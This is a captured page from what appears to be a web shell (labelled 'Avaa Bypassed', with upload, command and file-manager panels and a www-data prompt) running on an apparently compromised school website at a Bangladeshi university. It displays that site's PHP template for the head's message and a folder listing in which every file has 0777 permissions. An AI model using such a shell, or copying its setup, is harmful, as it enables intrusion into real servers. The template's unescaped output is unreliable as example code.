[ Avaa Bypassed ]




Upload:

Command:

www-data@18.117.157.139: ~ $
<div class="page-header-area">
    <div class="container">
        <div class="page-header-content">
            <h2 class="title"><span class="inner"><?php echo $this->lang->line('head_message'); ?></span></h2>
            <ul class="links">
                <li><a href="<?php echo site_url($school->school_url); ?>"><?php echo $this->lang->line('home'); ?></a></li>
                <li><a href="javascript:void(0);"><?php echo $this->lang->line('head_message'); ?></a></li>
            </ul>
        </div>
    </div>
</div>
<?php if(isset($head_details) && !empty($head_details)){ 

//print_r($head_details);
    ?>
   <div class="welcome-area">
        <div class="container">
            <div class="row">
                <?php if(isset($head_details->photo) && !empty($head_details->photo)){ ?>
                <div class="col-lg-6 col-md-6 col-12">

               
                        <div class="single-teacher" style="height:350px">
                            <div class="top">
                                <div class="img">
                                    <?php if(isset($head_details->photo) && !empty($head_details->photo)){ ?>
                                        <img src="<?php echo UPLOAD_PATH; ?>teacher-photo/<?php echo $head_details->photo; ?>" alt="">
                                    <?php }else{ ?>
                                        <img src="<?php echo IMG_URL; ?>default-user.png" alt="">
                                    <?php } ?>
                                </div>
                               <!-- <h4 class="title"><?php echo $head_details->name; ?></h4>-->
                                <?php if($head_details->status==2){ ?>
                                <h4 class="title">Study Leave</h4>

                                   <?php } ?>
                               <!-- <p class="category"><span class="inner"><?php echo $head_details->department; ?></span></p>-->
                            </div>
                            <ul class="meta">
                                <!--<li><span class="icon"><i class="fas fa-graduation-cap"></i></span> <?php echo $head_details->phone ? $head_details->phone : '&nbsp;'; ?></li>-->
                                 <li><span class="icon"><i class="fas fa-phone-volume"></i></span> <?php echo $head_details->phone ? $head_details->phone : '&nbsp;'; ?></li>
                                <li style="word-break: break-all;"><span class="icon"><i class="fas fa-envelope"></i></span> <?php echo $head_details->email ? $head_details->email : '&nbsp;'; ?></li>
                                <li><span class="icon"><i class="fas fa-map-marker-alt"></i></span> <?php echo $head_details->present_address ? $head_details->present_address : '&nbsp;'; ?></li>
                                <li><span class="icon"><i class="fas fa-tint"></i></span> <?php echo $head_details->blood_group ? $this->lang->line($head_details->blood_group) : '&nbsp;'; ?></li>
                            </ul>
                            <div class="bottom">
                                <ul class="social">
                                    <?php if($head_details->facebook_url){ ?>
                                        <li><a target="_blank" href="<?php echo $head_details->facebook_url; ?>"><i class="fab fa-facebook-f"></i></a></li>
                                    <?php } ?>
                                    <?php if($head_details->linkedin_url){ ?>    
                                        <li><a target="_blank" href="<?php echo $head_details->linkedin_url; ?>"><i class="fab fa-linkedin-in"></i></a></li>
                                     <?php } ?>
                                    <?php if($head_details->twitter_url){ ?>
                                        <li><a target="_blank" href="<?php echo $head_details->twitter_url; ?>"><i class="fab fa-twitter"></i></a></li>
                                     <?php } ?>                                    
                                    <?php if($head_details->instagram_url){ ?>    
                                        <li><a target="_blank" href="<?php echo $head_details->instagram_url; ?>"><i class="fab fa-instagram"></i></a></li>
                                     <?php } ?>
                               
                                    <?php if($head_details->youtube_url){ ?>
                                        <li><a target="_blank" href="<?php echo $head_details->youtube_url; ?>"><i class="fab fa-youtube"></i></a></li>
                                    <?php } ?>  
                                </ul>

                                 <?php if($head_details->pinterest_url){ ?>

                                      <div align="center"><a style="color:white;" target="_blank" class="btn btn-info btn-lg" href="<?php echo $head_details->pinterest_url; ?>">Web Page</a></div>


                                       
                                    <?php } ?>
                            </div>
                        </div>
                   

                    <!--<div class="welcome-banner" style="height:50px;">

                         <?php if(isset($head_details->photo) && !empty($head_details->photo)){ ?>
                                        <img  src="<?php echo UPLOAD_PATH; ?>teacher-photo/<?php echo $head_details->photo; ?>" alt="">
                                    <?php }else{ ?>
                                        <img src="<?php echo IMG_URL; ?>default-user.png" alt="">
                                    <?php } ?>


                     
                    </div>-->


                </div>
                <div class="col-lg-6 offset-lg-1_ col-md-6 col-12">
                    <div class="welcome-content">
                        <h2 class="title"><?php echo nl2br($head_details->name); ?>  </h2>
                         <p style="color:green;" ><?php echo nl2br($head_details->type); ?>, <?php echo $school->school_name; ?>, <br />Bangabandhu Sheikh Mujibur Rahman Digital University, Bangladesh. </p>
                        <p style="color:orange;" ><?php echo nl2br($head_details->title); ?>, <?php echo $school->school_name; ?>, <br />Bangabandhu Sheikh Mujibur Rahman Digital University, Bangladesh.  </p>
                         <br />
                        <h2 >
                           <!-- <?php if(isset($school->school_name)){ ?>
                                <?php echo $school->school_name; ?>
                            <?php }else{ ?>
                                  <?php echo SMS; ?>
                            <?php } ?>-->
                            From the Desk of  <?php echo nl2br($head_details->type); ?>  
                        </h2>
                        <p class="text" align="justify">
                            <?php echo nl2br($head_details->description); ?>  
                        </p>    

 <p class="text" class="ht-right" align="right">
                        Best wishes  <br /> 
                        <?php echo nl2br($head_details->name); ?>
                         </p>   
                                    
                    </div>
                </div>
                <?php }else{ ?>
                    <div class="col-lg-10 offset-lg-1 col-md-12 col-12">
                        <div class="welcome-content">
                            <h2 class="title"><?php echo $this->lang->line('welcome_to'); ?></h2>
                            <h2 class="title-2">
                                <?php if(isset($school->school_name)){ ?>
                                    <?php echo $school->school_name; ?>
                                <?php }else{ ?>
                                      <?php echo SMS; ?>
                                <?php } ?>
                            </h2>
                            <p class="text">
                                <?php echo nl2br($school->about_text); ?>  
                            </p>                        
                        </div>
                    </div>
                <?php } ?>
                
            </div>
        </div>
    </div>
<?php } ?>

Filemanager

Name Type Size Permission Actions
layout Folder 0777
about.php File 3.02 KB 0777
academic_calender.php File 3.57 KB 0777
active_teacher.php File 4.85 KB 0777
admission-form.php File 20.41 KB 0777
admission-online.php File 43.96 KB 0777
apa.php File 19.75 KB 0777
class_routine.php File 3.64 KB 0777
contact.php File 7.81 KB 0777
event.php File 3.07 KB 0777
event_detail.php File 4.93 KB 0777
faq.php File 1.84 KB 0777
gallery.php File 2.3 KB 0777
head_message.php File 7.97 KB 0777
head_served.php File 2.42 KB 0777
holiday.php File 2.72 KB 0777
holiday_detail.php File 3.78 KB 0777
inactive_teacher.php File 4.85 KB 0777
index.php File 24.34 KB 0777
leave_teacher.php File 4.85 KB 0777
news.php File 2.83 KB 0777
news_detail.php File 4.64 KB 0777
notice.php File 2.63 KB 0777
notice_detail.php File 4.06 KB 0777
other_resources.php File 3.59 KB 0777
page.php File 2.18 KB 0777
profile_detail.php File 25.44 KB 0777
publication.php File 1.88 KB 0777
splash.php File 25.63 KB 0777
staff.php File 4.5 KB 0777
student_notices.php File 4.94 KB 0777
students_form_resources.php File 3.52 KB 0777
teacher.php File 5.79 KB 0777